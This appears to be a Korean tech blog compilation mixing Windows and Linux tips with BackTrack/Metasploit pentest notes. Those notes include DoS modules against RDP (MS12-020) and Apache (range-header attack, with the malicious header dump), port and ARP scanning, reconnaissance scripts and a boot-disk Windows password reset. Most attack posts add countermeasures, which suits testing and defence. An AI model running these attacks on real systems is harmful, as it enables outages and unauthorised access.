[CMD] 특정 경로에서 CMD 창 열기
FTP로 파일 전송을 할 때,
또는 해당 폴더 위치에서 작업을 할 때 CMD 창을 여는 간단한 방법이 있습니다.
# 일반적인 마우스 우클릭 화면
바로 아래와 같은 방법 입니다.
# Shift + 마우스 우클릭 화면
[CMD] 특정 경로에서 CMD 창 열기
FTP로 파일 전송을 할 때,
또는 해당 폴더 위치에서 작업을 할 때 CMD 창을 여는 간단한 방법이 있습니다.
# 일반적인 마우스 우클릭 화면
바로 아래와 같은 방법 입니다.
# Shift + 마우스 우클릭 화면
[Cool Keyboard] 잘 알려지지 않은 윈도우7 단축키 모음
아래는 잘 알려지지 않은(?) 또는 사용을 잘 하지 않는 윈도우7 단축키 입니다.
# Ctrl + Alt + F : 윈도우 퓨전모드 설정
# 윈도우키 + 숫자 1~9 : 작업표시줄에 있는 아이콘 순서대로 호출
# 윈도우키 + Home : 창 최소화
# 윈도우키 + 방향키 : 좌측 또는 우측으로 창 배열
# 윈도우키 + Shift + 방향키 : 듀얼모니터 시 화면 전환
# 윈도우키 + D : 바탕화면 표시
# 윈도우키 + Tab : 창 3D 표시
# 윈도우키 + P : 프로젝터 모드
# 윈도우키 + + or - : 돋보기
[FootPrinting] 정보수집을 통해 OS 및 Open port 를 확인하는 방법
Nmap 과 같이 BackTrack을 통해 OS 정보 및 Port Scan을 할 수 있습니다.
# OS FootPrinting 방법
2. use auxiliary/scanner/smb/smb_version
3. set rhosts 192.168.10.248 // Target IP 192.168.10.248
4. exploit
# OS FootPrinting 방법
1. msfconsole
2. use auxiliary/scanner/portscan/syn
3. set rhosts 192.168.10.252 // Target IP 192.168.10.252
4. exploit
5. 결과
Port Scan 및 FootPrinting 행위 자체는 불법이므로 테스트 용도로만 사용하시길 바랍니다.
[ARP Scanner] Netdiscover - Active/Passive ARP 스캐너
BackTrack에 내장된 Netdiscover 는 activce / passive arp 스캐너 입니다.
Wardriving(워드라이빙) 이나 무선 네트워크 환경 또는 일반 스위칭 네트워크 환경에서도 사용이 가능합니다.
# 다운로드 URL : http://sourceforge.net/projects/netdiscover/files/latest/download
저는 BackTrack에서 테스트 해보았습니다.
# 사용 방법
1. 인터페이스 지정 후 네트워크 대역(/24) 스캐닝
netdiscover -i eth0 -r 192.168.10.0/24
2. 네트워크 대역을 스캐닝 하되 passive 모드로 스캐닝 // passive의 경우 패킷을 전송하지 않고 스니핑으로 스캔됨
netdiscover -i eth0 -r 192.168.10.0/24 -p
3. 도움말
netdiscover -h
윈도우 탐색기 또는 내컴퓨터에서 드라이브를 숨기는 방법이 있습니다.
보안 검열 및 기타 목적으로 드라이브를 숨길 경우 다음과 같은 방법으로 진행합니다.
# 방법
1. 시작 - 실행 - cmd - diskpart // diskpart 실행
2. list volume // 디스크 볼륨 확인
3. select volume e // E 드라이브를 숨기기 위해 E 드라이브 선택
4. remove letter e // 해당 볼륨의 문자(letter) 제거
5. 드라이브 제거 후 탐색기에서 E 드라이브가 사라진 화면
# 원복 방법
1. select volume 4 -> assign letter e // 해제한 볼륨 재 선택 후 문자 할당
2. 원복 후 해당 드라이브가 활성화된 화면
[Vulnerability Scanner] Joomscan 을 이용하여 웹 취약점 분석하기
Joomscan은 CMS로 유명한 Joomla 제품 전문 스캐너 입니다.
2012/10/22 업데이트에서는 673개의 취약점 항목을 검사할 수 있네요...
# BackTrack(CLI)에서 테스트하는 방법
1. cd /pentest/web/joomscan
2. ./joomscan.pl -u www.target.co.kr
# BackTrack(GUI)에서 테스트하는 방법
1. Applications -> BackTrack -> Vulnerability Assessment -> Web Application Assessment ->
CMS Vulnerability Identification -> joomscan
# joomscan update 방법
./joomscan.pl update
[BSOD] BackTrack을 이용한 RDP 취약점 테스트 / MS12-020 Microsoft Remote Desktop Use-After-Free DoS
원격 데스크톱의 취약점으로 인한 원격 코드 실행 문제점을 BackTrack을 통해 테스트 해보려고 합니다.
아래 취약점 코드가 실행될 경우 BSOD(Blue Screen of Deatch)가 실행됩니다.
참고 URL :
http://technet.microsoft.com/ko-kr/security/bulletin/ms12-020
http://www.exploit-db.com/exploits/18606/
# 테스트 방법
1. msfconsole 실행
2. msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
3. msf auxiliary(ms12_020_maxchannelids) > set rhost 192.168.10.248 // Target IP 설정
msf auxiliary(ms12_020_maxchannelids) > set rport 3387 // 원격데스크탑 port 설정
4. exploit
테스트 시 Target의 BSOD는 실패하였지만 다른 시스템에 테스트하였을 시 아래와 같은 블루스크린을 확인할 수 있었습니다.
# 대응방법
1. 서버의 원격데스크톱 포트를 3389에서 다른 포트로 변경하여 공격 시도를 줄입니다.
원격데스크톱 포트 변경 방법 : http://tisiphone.tistory.com/11
2. 윈도우 보안 업데이트를 합니다.
참조 URL : http://people.apache.org/~dirkx/CVE-2011-3192.txt
Apache Range Header DoS는 L7 어플리케이션 공격 중 일부로 일명 Apache Killer라고도 합니다.
HTTP는 헤더정보에 range를 사용하여 pdf 나 동영상 등의 일부를 로딩할 수 있습니다.
만약 문서를 로딩하는 바이트의 범위를 악의적으로 조작한다면 서버의 CPU와 메모리자원을 고갈시킬 수 있습니다.
# 리눅스 시스템에서 테스트
참조 URL : http://code.google.com/p/apache-range-header-test/
저는 CentOS 6.3에서 테스트 해보았습니다.
1. 패키지 설치
yum install perl perl-libwww-perl
2. script 다운로드
wget http://code.google.com/p/apache-range-header-test/downloads/detail?name=httprangetest.pl
3. 테스트
perl httprangetest.pl http://victim.com
# Backtrack 에서 테스트
1. msfconsole
2. 테스트
msf > use auxiliary/dos/http/apache_range_dos
msf auxiliary(apache_range_dos) > set rhost 1.1.1.1
msf auxiliary(apache_range_dos) > run
# 공격 시 트래픽 덤프 내용
HEAD / HTTP/1.1 Host: 1.1.1.1 Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19,5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29,5-30,5-31,5-32,5-33,5-34,5-35,5-36,5-37,5-38,5-39,5-40,5-41,5-42,5-43,5-44,5-45,5-46,5-47,5-48,5-49,5-50,5-51,5-52,5-53,5-54,5-55,5-56,5-57,5-58,5-59,5-60,5-61,5-62,5-63,5-64,5-65,5-66,5-67,5-68,5-69,5-70,5-71,5-72,5-73,5-74,5-75,5-76,5-77,5-78,5-79,5-80,5-81,5-82,5-83,5-84,5-85,5-86,5-87,5-88,5-89,5-90,5-91,5-92,5-93,5-94,5-95,5-96,5-97,5-98,5-99,5-100,5-101,5-102,5-103,5-104,5-105,5-106,5-107,5-108,5-109,5-
- 중략 -
1249,5-1250,5-1251,5-1252,5-1253,5-1254,5-1255,5-1256,5-1257,5-1258,5-1259,5-1260,5-1261,5-1262,5-1263,5-1264,5-1265,5-1266,5-1267,5-1268,5-1269,5-1270,5-1271,5-1272,5-1273,5-1274,5-1275,5-1276,5-1277,5-1278,5-1279,5-1280,5-1281,5-1282,5-1283,5-1284,5-1285,5-1286,5-1287,5-1288,5-1289,5-1290,5-1291,5-1292,5-1293,5-1294,5-1295,5-1296,5-1297,5-1298,5-1299 Accept-Encoding: gzip Connection: close |
# 대응방안 :
1. 아파치를 최신버전으로 패치합니다.
2. 상용 웹방화벽이나 mod_security와 같은 보안솔루션에서 HEAD Method를 사용을 해제 합니다.
[BackTrack] 백트랙 업데이트 하기
BackTrack을 사용하다 보면 가끔 업데이트 된 exploit을 사용해야 할 경우가 있습니다.
이럴 때 svn 업데이트를 하는 방법이 있습니다.
# 방법 : msfupdate
만약 msfupdate 가 되지 않을 경우,
해당 디렉터리에서 svn cleanup 명령을 해주면 됩니다.
1. cd /opt/metasploit/msf3
2. svn cleanup
3. msfupdate
[듀얼모니터] 윈도우 7에서 듀얼모니터를 사용할 경우 팁
기존 윈도우 XP에서는 지원되지 않았던 기능이 윈도우 7에서 지원되는 기능이 있습니다.
바로 화면관련 단축키 입니다.
윈도우키 + 왼쪽 화살표 : 화면을 왼쪽으로 분할
윈도우키 + 오른쪽 화살표 : 화면을 오른쪽으로 분할
윈도우키 + 위쪽 화살표 : 화면을 전체화면으로 위치
윈도우키 + 아래쪽 화살표 : 화면 원복 또는 작업표시줄로 축소
그 밖에도 윈도우 7에서 듀얼모니터를 사용할 경우 화면을 전환 시킬 수 있는 단축키가 있습니다.
바로 윈도우 + 쉬프트 + 왼쪽 화살표 or 윈도우 + 쉬프트 + 오른쪽 화살표 입니다.
저의 경우 WinSplit Revolution 이라는 툴을 사용하여 듀얼 모니터 간 화면 전환을 사용하였습니다.
그러나 윈도우 + 쉬프트 + 화살표 키를 통하여 윈도우 7 이상 시스템에서 바로 화면 전환이 가능합니다.
[Proxy Tool] Burp Suite v1.5 Released
지난 10월 31일 Burp Suite Free Edition v1.5가 릴리즈 되었습니다.
관련링크 : http://blog.portswigger.net/2012/10/burp-suite-free-edition-v15-released.html
무료 다운로드 링크 : http://portswigger.net/burp/download.html
[피싱 방지] 윈도우 호스트 파일 복구 방법
요즘 어플리케이션 설치 및 악성코드에 의해 윈도우 자체의 호스트 파일이 변조되는 경우가 많습니다.
이런 경우 마이크로소프트 사에서 제공하는 툴로 원복이 가능합니다.
# 방법
링크 : http://support.microsoft.com/kb/972034
해당 페이지를 클릭하신 후,
중간에 "문제 자동 해결" 또는 "Fix it" 이라는 아이콘을 클릭합니다.
설치와 함께 호스트 파일이 자동 복구 됩니다.
테스트 해보니 재부팅을 하지 않고도 바로 적용이 됩니다. ^^
출처 : 마이크로소프트 고객지원
리눅스 시스템에서 CPU를 확인할 경우 32비트 인지 64비트 인지 구분하기 어려운 경우가 있습니다.
물론 친숙한 리눅스 명령어 인
cat /proc/cpuinfo 로 확인 가능하지만 좀 더 쉬운 방법이 있습니다.
만약 리눅스 시스템에 dmidecode 라는 패키지가 설치되어 있을 경우,
한 눈에 CPU 개수 및 비트 수를 확인할 수 있습니다.
# 방법
dmidecode --type 4 명령을 이용합니다.
1. CPU 물리적 개수 확인 방법
dmidecode -t 4 | grep CPU
위와 같이 CPU1, CPU2의 경우 물리적으로 2개의 CPU를 표현합니다.
2. CPU 32, 64 비트 확인 방법
물론 cat /proc/cpuinfo 에서 lm flag(Long mode CPU / 64 bit) 가 있는 지 확인하는 방법도 있지만,
dmidecode -t 4 명령으로 쉽게 확인할 수 있습니다.
- dmidecode -type 4 명령 실행 화면 -
# 추가로 리눅스에서 비트를 확인하는 방법이 있습니다.
getconf LONG_BIT
사이트를 다니다 보면 리눅스 서버에 전원을 연결한 후 IP 등의 설정을 위해 모니터와 키보드를 연결해야 하는 불편한 상황이 자주 발생되기도 합니다.
리눅스 서버에 시리얼을 활성화 시켜 노트북에서 바로 콘솔을 통해 접속할 수 있는 방법이 있습니다.
# 서버에 시리얼 활성화 방법
1. 서버가 Serial을 지원하는 지 확인 합니다.
dmesg | grep tty
위와 같이 ttyS0 또는 ttyS1가 존재할 경우 시리얼 활성화가 가능합니다.
2. vi /etc/inittab 에 다음과 같은 줄을 넣어 줍니다.
s0:2345:respawn:/sbin/agetty -L -f /etc/issueserial 38400 ttyS0 vt100
(-f 옵션의 경우 /etc/issueserial 파일의 내용을 보여 줍니다.)
3. vi /etc/issueserial 파일을 생성합니다.
저는 파일에 Test System 이라고 넣었습니다.
4. vi /etc/securetty 파일에 다음과 같은 한 줄을 추가 합니다.
ttyS0
5. 마지막으로 콘솔화면에서 부팅화면까지 보고 싶은 경우 grub 파일을 수정합니다.
vi /etc/grub.conf 에 다음과 같은 항목을 넣습니다.
console=ttyS0,38400
이젠 콘솔 화면에서도 리눅스 시스템을 장비처럼 보실 수 있습니다.
[폴더삭제] 파일크기가 0인 폴더 삭제하는 방법
프로그램을 다운받는 도중 또는 프로그램 삭제가 제대로 되지 않아 폴더크기가 0이거나
폴더의 속성이 시스템 및 숨김으로 되어 있을 때 가끔 폴더 자체가 삭제되지 않는 경우가 있습니다.
물론 unlocker와 같은 프로그램을 통하여 삭제가 가능하지만 command 창에서도 명령을 통해 삭제가 가능합니다.
# 방법 :
rd /s 폴더이름
rd 명령어 사용법 / 예전에 DOS 시절에 많이 사용하던 rmdir 이군요...^^;;;
[XE] 외부링크에서 다운로드할 수 없습니다. 라는 에러메시지 해결방법
사무실에서 XE(제로보드)를 설치하여 테스트하는 중이었습니다.
기존 제로보드에서는 이런 메시지가 없었는데,
게시판 생성을 하고 나니 "외부링크에서 다운로드할 수 없습니다." 라는 다음과 같은 오류 메시지가
발생하였습니다.
원인을 찾기위해 구글링을 해봤으나 수확이 없었습니다. 그러나 설정 화면을 보다보니 해결책이 있더군요...
# 해결방법
위와 같이 Default 설정은 다른 사이트에서 첨부파일 링크하는 것을 차단하게 되어있네요...
해당 설정을 "예"로 바꾼 후 정상적으로 다운로드가 되는 것을 확인하였습니다.
[SecureCRT] 리눅스 시스템에서 sz, rz를 통한 파일 업, 다운로드 방법
콘솔 창에서 작업 시 winscp 및 ftp를 통한 파일 업, 다운로드를 자주 사용하게 됩니다.
이 때 rz, sz 리눅스 패키지를 통해 간편하게 파일의 업로드 및 다운로드가 가능합니다.
# 방법
1. lrzsz 패키지를 YUM을 통해 자동설치 합니다.
2. 패키지 설치 화면
설치가 완료되었습니다.
3. 파일 업로드 화면
rz라고 명령을 치시면 아래와 같이 창이 뜨며 전송이 가능합니다.
4. 파일 다운로드 화면
sz 파일명을 다시면 지정한 경로에 있는 파일이 다운로드 됩니다.
5. 파일 다운로드 경로는 SecureCRT에서 지정된 경로 입니다.
NetworkMiner 는 윈도우에서 동작하는 네트워크 포렌식 분석 툴(NFAT) 입니다.
네트워크 패킷 캡처가 가능하며, 오프라인에서 PCAP 파일을 분석할 수 있습니다.
다운로드 링크 : http://sourceforge.net/projects/networkminer/files/latest
IP, MAC, Hostname, Sent or Received Packet 등 여러가지 옵션으로 정렬하여 패킷을 분석할 수 있습니다.
[SSH] 크롬브라우저에서 SSH 사용하기
Chrome Browser에서 SSH를 사용할 수 있는 방법이 있습니다.
# 설치방법
크롬 웹 스토어에 들어가신 후,
ssh 로 검색을 합니다.
저는 이미 설치를 하였기 때문에 "앱 실행" 이라고 나옵니다.
"CHROME에 추가"를 누르셔서 계정을 입력하신 후 "Secure Shell"을 추가를 합니다.
이 후 크롭에서 "새탭"을 클릭하시면 위와 같이 Secure Shell 이 설치된 것을 보실 수 있습니다.
# 실행화면
putty 보다 가독성이 좋은 것 같지만 아직 한글 폰트는 지원되지 않는 것 같습니다.
BrowserHistorySpy는 SecurityXploded 사에서 개발된 툴로 이름 그대로 웹 브라우저의 히스토리를 확인할 수 있습니다.
다운로드 링크 : http://securityxploded.com/browser-history-spy.php
설치 버전 및 포터블 버전(실행파일)도 있습니다.
이와 비슷한 툴로 NirSoft 사의 IEHistoryView 툴이 있습니다.
다운로드 링크 : http://www.nirsoft.net/utils/iehv.zip
[Steganography] 무료 스테가노그래피 툴 OpenStego
스테가노그래피는 커다란 메시지 또는 의미없는 메시지 안에 비밀 메시지를 숨기기는 기법으로
보통 사진, 음악, 다량의 텍스트 등에 비밀 메시지를 숨깁니다.
다음은 얼마전 종영된 드라마 유령에서도 나왔던 툴로
윈도우 및 *NIX 계열에서 동작가능한 OpenStego 툴 입니다.
툴을 실행하면 Embed 및 Extract를 할 수 있습니다.
# 다운로드 경로 : http://sourceforge.net/projects/openstego/files/openstego/
1. 파일을 숨기는 과정
Secret_Document.txt 파일을 Cover_Image.jpg 안에 숨겨 새롭게 result.png 파일을 생성하는 화면
2. 파일을 복원하는 과정
result.png 파일을 이용하여 원본 비밀 파일을 복원하는 화면
[OSX] Free Vaccine / Avira
맥용 무료 백신으로 Avira 가 있습니다.
윈도우에서도 Avira를 사용하긴 하지만 OSX 용 백신으로도 좋은 것 같습니다.
다운로드 링크 1 : http://www.macupdate.com/app/mac/42458/avira-/
다운로드 링크 2 : http://www.avira.com/en/download/product/avira-free-mac-security
[OSX] CCleaner for OSX
맥용 CCleaner 가 있습니다.
다운로드 경로 : http://www.piriform.com/mac/ccleaner
윈도우 용과 마찬가지로 Wiping 기능이 제공됩니다.
[YUM] Another app is currently holding the yum lock; 에러발생 시 조치방법
리눅스 서버에서 yum update 및 install 을 할 때 가끔 아래와 같은 에러 메시지가 나올 경우가 있습니다.
Existing lock /var/run/yum.pid: another copy is running as pid 32714.
Another app is currently holding the yum lock; waiting for it to exit...
와 같이 에러가 발생됩니다.
# 조치방법 : rm -rf /var/run/yum.pid
yum.pid 삭제 후 yum 명령을 사용하면 다시 되는 것을 확인할 수 있습니다.
[FTP] FTP 자동 백업 배치파일
가끔 서버의 설정 파일을 원격지에 백업을 해야할 경우가 있습니다.
이럴때 간단한 배치파일을 이용하여 FTP 서버에 자동 로그인하여 파일을 백업할 수 있습니다.
이러한 자동 로그인 배치파일은 자주 사용하는 FTP 서버에 접속할 때도 편하게 사용될 수 있습니다.
# 사용방법
1. 우선 텍스트 파일을 생성합니다. 내용은 다음과 같이 적은 후 auto_ftp.txt 파일로 저장 합니다.
open : ftp 서버에 접속
ftpuser : 계정
qwe123 : 비밀번호
bin : binary 형태로 파일 전송
hash : 파일전송 시 #로 상태 확인
prompt : 파일전송 확인여부 표시(on/off)
put : 파일 전송 / 업로드
quit : 종료
2. 이젠 auto_backup.bat 라는 배치파일을 만듭니다.
ftp -s:파일이름
예) ftp -s:auto_ftp.txt
3. auto_backup.bat 파일 실행화면
이와 같은 방법을 통하여 배치파일을 이용하여 간단하게 원격지로 파일을 백업할 수 있습니다.
[우분투] Backtrack에서 SSH 자동 실행하기
백트랙을 Vmware에 설치한 뒤 원격에서 SSH 접속하여 테스트하려니 자주 걸리는 문제가 있었습니다.
바로 SSH 서비스가 시스템 시작과 동시에 시작되지 않아서 Vmware에 접속하여 매번 수동으로
/etc/init.d/ssh start 명령을 해줘야 했습니다.
리눅스의 chkconfig service on 명령과 같이 우분투에도 rc.d에 서비스를 등록하여,
시스템 시작 시 자동으로 서비스가 시작되도록 설정할 수 있습니다.
# 설정 방법
1. update-rc.d ssh defaults
위와 같은 명령을 통해 SSH 서비스를 자동 시작하도록 설정할 수 있습니다.
# 설정 해제 방법
1. update-rc.d -f ssh remove // -f 와 remove 옵션을 사용합니다.
위와 같은 명령을 통해 해제도 가능합니다.
X11 포워딩을 통하여 putty 나 SecureCRT 와 같은 접속툴에서 리눅스의 GUI 화면을 볼 수 있습니다.
물론 리눅스 GUI 화면은 명령을 실행했을 때의 화면이 접속툴을 통해 보여지는 것 입니다.
# 방법
1. 윈도우 접속툴의 경우 GUI 환경을 지원해 주지 못하므로 우선 Xming 을 다운로드하여 설치합니다.
다운로드 경로 : http://sourceforge.net/projects/xming/
저는 소스포지에서 6.9.0.31 버전을 다운 받았습니다.
2. 그냥 Full installation 으로 설치합니다.
3. 설치 후 실행을 합니다.
4. 다음은 putty 및 SecureCRT 에서 설정을 합니다.
가. putty 설정 화면
putty - Connection - SSH - X11 설정 탭에서
EnableX11 forwarding 에 체크 후 X display location 에 localhost:0.0 으로 합니다.
나. putty 에서 firefox 실행 화면
5. 마찬가지로 이번엔 SecureCRT 에서 설정을 한 후 테스트 해보겠습니다.
가. SecureCRT 설정 화면
SecureCRT 는 Session Options 및 Global Options 에서 간단하게 설정할 수 있습니다.
우선 Global Options 창의 Default Settings 으로 들어갑니다.
Session Options 에서 Forward X11 Packets 에 체크하면 됩니다.
나. SecureCRT 에서 firefox 실행 화면
[taskkill] 윈도우 프로세스를 한방에 종료시키는 방법
윈도우 명령어 중 taskkill 명령은 리눅스의 killall과 비슷하게 하나이상의 프로세스를 종료시킬 수 있는 명령어 입니다.
ex) taskkill /f /im notepad.exe(윈도우) == killall java(리눅스)
# 사용방법
- 프로세스가 다수 떠있는 경우 -
꼭 웜 바이러스처럼 메모장 프로세스가 상당히 많이 로딩되어 있는 것을 확인하실 수 있습니다.
사용방법은 다음과 같습니다.
taskkill /f /im notepad.exe // 여기서 F는 프로세스 강제 종료, IM은 프로세스 이름을 뜻합니다.
마찬가지로 taskkill /f /im notepad* 와 같이 와일드카드(*) 필터를 사용하여 프로세스를 종료할 수도 있습니다.
- 명령 실행 후 모습 -
[goohost] goohost 를 이용하여 fingerprinting 하기
goohost 는 구글 검색을 통하여 특정도메인의 호스트/서브도메인, IP, 이메일 등을 보여주는 간단한
스크립트 입니다. watakushi 라는 분이 스크립트를 제작하였네요...
goohost 를 이용하여 사이트에 대한 핑거프린팅이 가능합니다.
저는 backtrack 5.2 에 설치된 파일로 테스트 해보았습니다.
# 테스트 방법
1. 호스트 검색 시
./goohost.sh -m host -t test.com
2. IP 검색 시
./goohost.sh -m ip -t test.com
3. 이메일 검색 시
./goohost.sh -m mail -t test.com
테스트 후 TXT 파일로 결과가 나옵니다.
more(cli)또는 gedit(gui) 로 확인 가능합니다.
또한 goohost 설치방법은 위키에서도 잘 나와있습니다.
http://www.aldeid.com/wiki/Goohost
[윈도우] 윈도우 비밀번호 초기화 방법
서버 및 개인 PC를 운영하다보면 비밀번호를 잊어버려 윈도우 OS를 새로 설치하는 경우가 있습니다.
이전에 3rd party 프로그램을 이용하여 윈도우 비밀번호를 크랙하는 방법을 올린 적이 있습니다.
이번 방법은 위의 방법과 비슷하지만 훨씬 더 심플하게 접근할 수 있는 방법 입니다.
단, SAM 파일을 통한 recovery 방법이기에 시스템 환경에 따라 안 되는 경우도 있습니다.
1. 첨부파일 다운로드
# CD 용 이미지 :
# USB 용 이미지 :
CD 용 이미지의 경우 부팅이미지로 그냥 CD로 구우면 됩니다.
USB 용 이미지의 경우 압축해제 후 해당 파일을 부팅용 USB에 복사하면 됩니다.
2. 해당 시스템에 USB를 꽂거나 CD로 부팅...
(저는 가상환경에서 테스팅을 하였습니다.)
3. 여러 부팅 옵션이 있으나 그냥 "엔터"를 누릅니다.
레지스트리 디렉터리 확인 시 그냥 "엔터"를 누릅니다.
4. 1번을 눌러 비밀번호 초기화 모드에 들어갑니다.
5. 다시 1번을 누릅니다.
6. 비밀번호를 변경할 계정을 선택합니다.
저의 경우 MYHOME 이라는 계정을 선택하였습니다.
RID의 값을 입력하는 데 0x03ef를 입력합니다.
7. 1번을 눌러 비밀번호를 초기화 합니다.
8. Password Cleared! 라고 표시가 되면 비밀번호가 초기화 된 것입니다.
이제 시스템을 재부팅하면 비밀번호가 초기화 된 것을 확인하실 수 있습니다.
위의 방법을 통해 윈도우 비밀번호 분실 시 포맷을 하지 않고 복구를 합니다~!